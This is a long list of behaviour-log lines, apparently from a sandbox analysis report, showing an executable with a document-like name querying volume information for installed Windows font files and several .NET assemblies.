Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
